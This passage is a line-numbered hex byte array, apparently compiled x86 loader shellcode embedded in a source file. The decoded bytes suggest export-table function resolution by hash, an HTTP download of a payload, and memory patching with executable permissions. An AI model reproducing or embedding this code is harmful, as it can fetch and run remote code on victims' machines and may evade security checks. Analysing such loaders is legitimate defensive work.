86 0x83, 0xfe, 0x04, 0x75, 0xee, 0x89, 0x11, 0xf0, 0xff, 0x42, 0x04, 0xeb,
87 0x1d, 0x33, 0xf6, 0x8b, 0x84, 0xb7, 0xb4, 0x06, 0x00, 0x00, 0x3b, 0x04,
88 0xb3, 0x75, 0x13, 0x46, 0x83, 0xfe, 0x04, 0x75, 0xee, 0x8d, 0x42, 0x08,
89 0x89, 0x01, 0xf0, 0xff, 0x42, 0x0c, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21,
90 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00,
91 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x18, 0x00,
92 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
93 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00, 0x8b, 0x44,
94 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56, 0x8b, 0x74,
95 0x24, 0x10, 0x8d, 0x86, 0x58, 0x03, 0x00, 0x00, 0x50, 0xff, 0x56, 0x30,
96 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00, 0x00, 0x00,
97 0x55, 0x57, 0x8d, 0x86, 0xc0, 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56,
98 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00, 0x00, 0xbf,
99 0x38, 0x14, 0x40, 0x00, 0x81, 0xef, 0x2c, 0x14, 0x40, 0x00, 0x0f, 0x88,
100 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
101 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00, 0x00, 0x00,
102 0x57, 0xe8, 0x37, 0x1c, 0x00, 0x00, 0xb9, 0x2c, 0x14, 0x40, 0x00, 0x81,
103 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8, 0x90, 0x20,
104 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff, 0x74,
105 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xd0, 0x05, 0x00,
106 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x49,
107 0xbf, 0x4e, 0x14, 0x40, 0x00, 0xbb, 0x42, 0x14, 0x40, 0x00, 0x2b, 0xfb,
108 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff,
109 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xdd, 0x1b, 0x00, 0x00,
110 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8, 0x3b,
111 0x20, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0xff,
112 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
113 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x51, 0x53, 0x56,
114 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x64, 0x03, 0x00, 0x00, 0x50, 0xff,
115 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
116 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0x70, 0x05, 0x00, 0x00, 0x50, 0x53,
117 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
118 0x00, 0xbf, 0xc8, 0x30, 0x40, 0x00, 0x81, 0xef, 0xa9, 0x13, 0x40, 0x00,
119 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
120 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
121 0x00, 0x00, 0x57, 0xe8, 0x51, 0x1b, 0x00, 0x00, 0xb9, 0xa9, 0x13, 0x40,
122 0x00, 0x81, 0xe9, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
123 0xaa, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
124 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0x90,
125 0x05, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
126 0x74, 0x49, 0xbf, 0xbf, 0x30, 0x40, 0x00, 0xbb, 0xb0, 0x30, 0x40, 0x00,
127 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
128 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0xf7, 0x1a,
129 0x00, 0x00, 0x81, 0xeb, 0xed, 0x30, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
130 0xe8, 0x55, 0x1f, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10,
131 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0,
132 0x40, 0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x81,
133 0xec, 0x58, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0x6a, 0x3c, 0x5e, 0x33,
134 0xff, 0x8d, 0x44, 0x24, 0x28, 0x56, 0x57, 0x50, 0x89, 0x7c, 0x24, 0x1c,
135 0xbb, 0x00, 0x02, 0x60, 0x84, 0xe8, 0x38, 0x1f, 0x00, 0x00, 0x8d, 0x44,
136 0x24, 0x70, 0x89, 0x74, 0x24, 0x34, 0x8b, 0xb4, 0x24, 0x74, 0x02, 0x00,
137 0x00, 0x83, 0xc4, 0x0c, 0x89, 0x44, 0x24, 0x38, 0x8d, 0x84, 0x24, 0x64,
138 0x01, 0x00, 0x00, 0x89, 0x44, 0x24, 0x54, 0xb8, 0x00, 0x01, 0x00, 0x00,
139 0x89, 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x58, 0x8d, 0x44, 0x24, 0x28,
140 0x50, 0x68, 0x00, 0x00, 0x00, 0x10, 0x57, 0x8d, 0x86, 0xe8, 0x06, 0x00,
141 0x00, 0x50, 0xff, 0x96, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
142 0xac, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x83, 0x7c, 0x24, 0x34, 0x04, 0x57,
143 0x57, 0x0f, 0x94, 0xc0, 0x57, 0x89, 0x44, 0x24, 0x20, 0xb8, 0x00, 0x32,
144 0xe0, 0x84, 0x57, 0x57, 0x0f, 0x44, 0xd8, 0xff, 0x96, 0x94, 0x00, 0x00,
145 0x00, 0x89, 0x44, 0x24, 0x24, 0x85, 0xc0, 0x0f, 0x84, 0x7f, 0x01, 0x00,
146 0x00, 0x57, 0x57, 0x6a, 0x03, 0x57, 0x57, 0xff, 0x74, 0x24, 0x54, 0x8d,
147 0x4c, 0x24, 0x7c, 0x51, 0x50, 0xff, 0x96, 0x98, 0x00, 0x00, 0x00, 0x8b,
148 0xc8, 0x89, 0x4c, 0x24, 0x20, 0x85, 0xc9, 0x0f, 0x84, 0xfb, 0x00, 0x00,
149 0x00, 0x55, 0x57, 0x53, 0x57, 0x57, 0x57, 0x8d, 0x84, 0x24, 0x7c, 0x01,
150 0x00, 0x00, 0x50, 0x8d, 0x86, 0xe8, 0x07, 0x00, 0x00, 0x50, 0x51, 0xff,
151 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xca,
152 0x00, 0x00, 0x00, 0x39, 0x7c, 0x24, 0x18, 0x74, 0x20, 0xf7, 0xc3, 0x00,
153 0x10, 0x00, 0x00, 0x74, 0x18, 0x6a, 0x04, 0x8d, 0x44, 0x24, 0x20, 0xc7,
154 0x44, 0x24, 0x20, 0x80, 0x33, 0x00, 0x00, 0x50, 0x6a, 0x1f, 0x55, 0xff,
155 0x96, 0x9c, 0x00, 0x00, 0x00, 0x57, 0x57, 0x57, 0x57, 0x55, 0xff, 0x96,
156 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x8a, 0x00, 0x00, 0x00,
157 0x57, 0x8d, 0x44, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00,
158 0x00, 0x50, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x13, 0x00, 0x00, 0x20,
159 0x55, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x81,
160 0x7c, 0x24, 0x14, 0xc8, 0x00, 0x00, 0x00, 0x75, 0x5d, 0x57, 0x8d, 0x44,
161 0x24, 0x14, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0x50, 0x8d,
162 0x9e, 0x18, 0x09, 0x00, 0x00, 0x53, 0x68, 0x05, 0x00, 0x00, 0x20, 0x55,
163 0x89, 0x3b, 0x89, 0x7b, 0x04, 0xff, 0x96, 0xb0, 0x00, 0x00, 0x00, 0x85,
164 0xc0, 0x74, 0x33, 0x8b, 0x03, 0x0b, 0x43, 0x04, 0x74, 0x2c, 0x6a, 0x04,
165 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x33, 0x57, 0xff, 0x56, 0x3c, 0x89,
166 0x86, 0x20, 0x09, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x15, 0x8d, 0x4c, 0x24,
167 0x20, 0x89, 0x7c, 0x24, 0x20, 0x51, 0xff, 0x33, 0x50, 0x55, 0xff, 0x96,
168 0xa0, 0x00, 0x00, 0x00, 0x8b, 0xf8, 0x55, 0xff, 0x96, 0xa4, 0x00, 0x00,
169 0x00, 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x5d,
170 0xff, 0x74, 0x24, 0x24, 0xff, 0x96, 0xa4, 0x00, 0x00, 0x00, 0x85, 0xff,
171 0x74, 0x4e, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff,
172 0xb6, 0x18, 0x09, 0x00, 0x00, 0x8b, 0x9e, 0x20, 0x09, 0x00, 0x00, 0x8d,
173 0x86, 0x08, 0x09, 0x00, 0x00, 0x53, 0x50, 0x8d, 0x86, 0xf8, 0x08, 0x00,
174 0x00, 0x50, 0xe8, 0x48, 0x1a, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86,
175 0xf0, 0x07, 0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x11, 0x19, 0x00,
176 0x00, 0x83, 0xc4, 0x1c, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c,
177 0x3b, 0x93, 0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc7, 0xeb, 0x02,
178 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0xc3,
179 0x81, 0xec, 0xdc, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24,
180 0xf0, 0x01, 0x00, 0x00, 0x57, 0x8b, 0x6e, 0x3c, 0x8b, 0x44, 0x2e, 0x78,
181 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8d, 0x3c, 0x30, 0x8b,
182 0x5f, 0x18, 0x85, 0xdb, 0x0f, 0x84, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x47,
183 0x1c, 0x33, 0xd2, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24,
184 0x24, 0x8b, 0x47, 0x20, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x14, 0x8b, 0x47,
185 0x24, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x8b, 0x47, 0x0c, 0x03, 0xc6,
186 0x8a, 0x08, 0x84, 0xc9, 0x74, 0x2a, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x94,
187 0x24, 0xe8, 0x00, 0x00, 0x00, 0x2b, 0xd0, 0x80, 0xc9, 0x20, 0x46, 0x88,
188 0x0c, 0x02, 0x40, 0x8a, 0x08, 0x84, 0xc9, 0x75, 0xf2, 0x89, 0x74, 0x24,
189 0x10, 0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10,
190 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00,
191 0x00, 0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4,
192 0x24, 0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x47, 0x18, 0x00, 0x00, 0x89,
193 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0,
194 0xfc, 0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10,
195 0xff, 0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24,
196 0x04, 0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x16, 0x18, 0x00, 0x00,
197 0x33, 0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b,
198 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc,
199 0x01, 0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04,
200 0x89, 0x44, 0x24, 0x10, 0x83, 0xeb, 0x01, 0x75, 0xbb, 0x33, 0xc0, 0x5f,
201 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x01, 0x00, 0x00, 0xc3, 0x8b, 0x44,
202 0x24, 0x20, 0x8b, 0x4c, 0x24, 0x24, 0x0f, 0xb7, 0x44, 0x58, 0xfe, 0x8b,
203 0x0c, 0x81, 0x03, 0xce, 0x3b, 0xcf, 0x72, 0x7d, 0x8b, 0x44, 0x2e, 0x7c,
204 0x03, 0xc7, 0x3b, 0xc8, 0x73, 0x73, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x1e,
205 0x8d, 0x7c, 0x24, 0x28, 0x8b, 0xf1, 0x2b, 0xf9, 0x83, 0xfa, 0x3c, 0x73,
206 0x11, 0x8a, 0x06, 0x88, 0x04, 0x37, 0x80, 0x3e, 0x2e, 0x74, 0x07, 0x42,
207 0x46, 0x80, 0x3e, 0x00, 0x75, 0xea, 0xc7, 0x44, 0x14, 0x29, 0x64, 0x6c,
208 0x6c, 0x00, 0x42, 0x03, 0xca, 0x33, 0xd2, 0x38, 0x11, 0x74, 0x17, 0x8d,
209 0x74, 0x24, 0x68, 0x2b, 0xf1, 0x83, 0xfa, 0x7f, 0x73, 0x0c, 0x8a, 0x01,
210 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef, 0x8b, 0xb4,
211 0x24, 0xf0, 0x01, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xc6, 0x44,
212 0x14, 0x6c, 0x00, 0xff, 0x56, 0x30, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x4c,
213 0x24, 0x68, 0x51, 0x50, 0xff, 0x56, 0x34, 0x8b, 0xc8, 0xeb, 0x02, 0x33,
214 0xc9, 0x8b, 0xc1, 0xe9, 0x5b, 0xff, 0xff, 0xff, 0x56, 0x8b, 0x74, 0x24,
215 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85, 0xc9, 0x74, 0x09, 0x8b,
216 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x18, 0x8b, 0x4e, 0x1c, 0x85,
217 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x1c,
218 0x8b, 0x4e, 0x14, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50,
219 0x08, 0x89, 0x7e, 0x14, 0x8b, 0x4e, 0x10, 0x85, 0xc9, 0x74, 0x09, 0x8b,
220 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x10, 0x8b, 0x4e, 0x0c, 0x85,
221 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x7e, 0x0c,
222 0x8b, 0x4e, 0x08, 0x85, 0xc9, 0x74, 0x12, 0x8b, 0x01, 0x51, 0xff, 0x50,
223 0x2c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x89, 0x7e,
224 0x08, 0x8b, 0x4e, 0x04, 0x85, 0xc9, 0x74, 0x09, 0x8b, 0x01, 0x51, 0xff,
225 0x50, 0x08, 0x89, 0x7e, 0x04, 0x8b, 0x0e, 0x85, 0xc9, 0x74, 0x08, 0x8b,
226 0x01, 0x51, 0xff, 0x50, 0x08, 0x89, 0x3e, 0x5f, 0x5e, 0xc3, 0x8b, 0x44,
227 0x24, 0x04, 0x83, 0xc0, 0x10, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
228 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x0c, 0x00, 0xb8, 0x01, 0x40,
229 0x00, 0x80, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24,
230 0x18, 0xff, 0x74, 0x24, 0x14, 0x8b, 0x40, 0x08, 0xff, 0x74, 0x24, 0x14,
231 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0xc2, 0x18, 0x00, 0xb8, 0x01, 0x40,
232 0x00, 0x80, 0xc2, 0x14, 0x00, 0x57, 0x8b, 0x7c, 0x24, 0x14, 0x85, 0xff,
233 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x16, 0x56, 0x8b, 0x74,
234 0x24, 0x0c, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04, 0x8b,
235 0x46, 0x08, 0x89, 0x07, 0x33, 0xc0, 0x5e, 0x5f, 0xc2, 0x10, 0x00, 0x8b,
236 0x44, 0x24, 0x08, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
237 0xeb, 0x08, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x08,
238 0x00, 0x55, 0x8b, 0xec, 0xff, 0x75, 0x28, 0x8b, 0x45, 0x08, 0xff, 0x75,
239 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff, 0x75, 0x1c, 0xff, 0x75,
240 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51, 0xff, 0x52, 0x2c, 0x5d,
241 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x04, 0x02, 0x00, 0x00,
242 0x53, 0x56, 0x57, 0xe8, 0xa5, 0x15, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0xb9,
243 0xd2, 0x1d, 0x40, 0x00, 0xbf, 0xed, 0x30, 0x40, 0x00, 0x2b, 0xcf, 0x03,
244 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0x8b, 0x15, 0x00, 0x00, 0xb9, 0x8a,
245 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04,
246 0xe8, 0x78, 0x15, 0x00, 0x00, 0xb9, 0x5b, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
247 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08, 0xe8, 0x65, 0x15, 0x00, 0x00,
248 0xb9, 0xf7, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
249 0x48, 0x0c, 0xe8, 0x52, 0x15, 0x00, 0x00, 0xb9, 0xcd, 0x1a, 0x40, 0x00,
250 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x10, 0xe8, 0x3f, 0x15,
251 0x00, 0x00, 0xb9, 0xa9, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
252 0x06, 0x89, 0x48, 0x14, 0xe8, 0x2c, 0x15, 0x00, 0x00, 0xb9, 0x11, 0x1b,
253 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8,
254 0x19, 0x15, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
255 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8, 0x06, 0x15, 0x00, 0x00, 0xb9,
256 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
257 0x20, 0xe8, 0xf3, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b,
258 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x24, 0xe8, 0xe0, 0x14, 0x00,
259 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
260 0x89, 0x48, 0x28, 0xe8, 0xcd, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40,
261 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0xba,
262 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
263 0x8b, 0x06, 0x89, 0x48, 0x30, 0xe8, 0xa7, 0x14, 0x00, 0x00, 0xb9, 0x43,
264 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34,
265 0xe8, 0x94, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
266 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x38, 0xe8, 0x81, 0x14, 0x00, 0x00,
267 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
268 0x48, 0x3c, 0xe8, 0x6e, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
269 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x40, 0xe8, 0x5b, 0x14,
270 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
271 0x06, 0x89, 0x48, 0x44, 0xe8, 0x48, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11,
272 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8,
273 0x35, 0x14, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
274 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x4c, 0xe8, 0x22, 0x14, 0x00, 0x00, 0xb9,
275 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
276 0x50, 0xe8, 0x0f, 0x14, 0x00, 0x00, 0xb9, 0xa1, 0x1a, 0x40, 0x00, 0x2b,
277 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x54, 0xe8, 0xfc, 0x13, 0x00,
278 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
279 0x89, 0x48, 0x58, 0xe8, 0xe9, 0x13, 0x00, 0x00, 0xb9, 0xc5, 0x1a, 0x40,
280 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0xd6,
281 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
282 0x8b, 0x06, 0x89, 0x48, 0x60, 0xe8, 0xc3, 0x13, 0x00, 0x00, 0xb9, 0x6b,
283 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64,
284 0xe8, 0xb0, 0x13, 0x00, 0x00, 0xb9, 0x99, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
285 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x68, 0xe8, 0x9d, 0x13, 0x00, 0x00,
286 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
287 0x48, 0x6c, 0xe8, 0x8a, 0x13, 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00,
288 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x70, 0xe8, 0x77, 0x13,
289 0x00, 0x00, 0xb9, 0x1e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x8b, 0x7d, 0x08,
290 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x74, 0x8d, 0x85, 0xfc, 0xfd, 0xff,
291 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87, 0xe8, 0x05, 0x00, 0x00,
292 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x30, 0x13, 0x00, 0x00, 0x83, 0xc4,
293 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd, 0xff, 0xff, 0x53, 0x50,
294 0xff, 0x97, 0x8c, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b,
295 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0x84, 0x06, 0x00, 0x00, 0x50, 0x8b,
296 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x54,
297 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
298 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xc9, 0x56, 0x8b, 0x74, 0x24,
299 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84, 0x8f, 0xf4, 0x05, 0x00, 0x00,
300 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb,
301 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x04, 0x06, 0x00, 0x00, 0x3b, 0x04,
302 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x14, 0x33,
303 0xc9, 0x8b, 0x84, 0x8f, 0x84, 0x06, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75,
304 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee, 0x89, 0x32, 0x33, 0xc0, 0xeb,
305 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b,
306 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x6a, 0x00, 0x6a, 0x00, 0x6a,
307 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x38, 0x33, 0xc0,
308 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f,
309 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00, 0x8b, 0x44, 0x24, 0x04, 0xff,
310 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff, 0x50, 0x4c, 0x33, 0xc0, 0xc2,
311 0x08, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x56,
312 0x8b, 0x75, 0x08, 0x57, 0x81, 0xc6, 0x6c, 0x04, 0x00, 0x00, 0x8a, 0x0e,
